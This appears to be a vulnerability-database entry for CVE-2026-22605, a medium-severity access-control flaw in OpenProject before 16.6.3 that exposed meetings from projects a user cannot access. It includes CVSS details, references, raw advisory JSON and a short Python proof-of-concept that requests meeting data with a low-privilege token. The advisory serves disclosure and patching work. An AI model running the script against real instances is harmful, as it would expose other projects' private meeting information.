Security Vulnerability Report
CVE-2026-22605 CVSS 4.3 MEDIUM


Published: 2026-01-10 02:15:49
Last Modified: 2026-01-14 22:27:55

Description

OpenProject is open-source, web-based project management software. OpenProject versions prior to 16.6.3 allowed users holding the View Meetings permission on any project to read the details of meetings that belong to projects the user has no access to. This issue has been patched in version 16.6.3.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:openproject:openproject:*:*:*:*:*:*:*:* - VULNERABLE
OpenProject < 16.6.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-22605 PoC - OpenProject IDOR Meeting Access
# This PoC demonstrates accessing meetings from projects the user has no access to
import requests
import json

TARGET_URL = "https://vulnerable-openproject-instance.com"
ATTACKER_TOKEN = "your_low_privilege_user_token"  # User with View Meetings permission on any project
TARGET_MEETING_ID = 12345  # Meeting ID from a project the attacker has no access to


def exploit_meeting_access():
    """
    Exploit CVE-2026-22605: IDOR in OpenProject meeting access control
    Allows users with View Meetings permission to access meetings from inaccessible projects
    """
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json",
    }

    # Step 1: Try to access meeting details directly using meeting ID
    # The vulnerable endpoint doesn't properly verify project access
    endpoint = f"{TARGET_URL}/api/v3/meetings/{TARGET_MEETING_ID}"

    print(f"[*] Attempting to access meeting ID: {TARGET_MEETING_ID}")
    print(f"[*] Target endpoint: {endpoint}")

    response = requests.get(endpoint, headers=headers)

    if response.status_code == 200:
        meeting_data = response.json()
        print("[+] SUCCESS: Accessed meeting details from inaccessible project!")
        print(f"[+] Meeting Title: {meeting_data.get('title', 'N/A')}")
        print(f"[+] Project ID: {meeting_data.get('project', {}).get('id', 'N/A')}")
        print(f"[+] Full response: {json.dumps(meeting_data, indent=2)}")
        return True
    elif response.status_code == 403:
        print("[-] Access denied - target may be patched or token invalid")
        return False
    else:
        print(f"[-] Unexpected response: {response.status_code}")
        return False


if __name__ == "__main__":
    exploit_meeting_access()
```

References

- https://github.com/opf/openproject/releases/tag/v16.6.3 (Release Notes)
- https://github.com/opf/openproject/security/advisories/GHSA-fq4m-pxvm-8x2j (Patch, Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-22605",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-10T02:15:49.487",
    "lastModified": "2026-01-14T22:27:55.377",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "OpenProject is an open-source, web-based project management software. OpenProject versions prior to version 16.6.3, allowed users with the View Meetings permission on any project, to access meeting details of meetings that belonged to projects, the user does not have access to. This issue has been patched in version 16.6.3."
      },
      {
        "lang": "es",
        "value": "OpenProject es un software de gestión de proyectos de código abierto y basado en la web. Las versiones de OpenProject anteriores a la versión 16.6.3 permitían a los usuarios con el permiso 'Ver reuniones' en cualquier proyecto, acceder a los detalles de reuniones que pertenecían a proyectos a los que el usuario no tenía acceso. Este problema ha sido parcheado en la versión 16.6.3."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-284"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:openproject:openproject:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "16.6.3",
                "matchCriteriaId": "B2267B9E-E4A8-4C9D-9BEF-BE744BAEDF0E"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/opf/openproject/releases/tag/v16.6.3",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://github.com/opf/openproject/security/advisories/GHSA-fq4m-pxvm-8x2j",
        "source": "[email protected]",
        "tags": ["Patch", "Vendor Advisory"]
      }
    ]
  }
}
```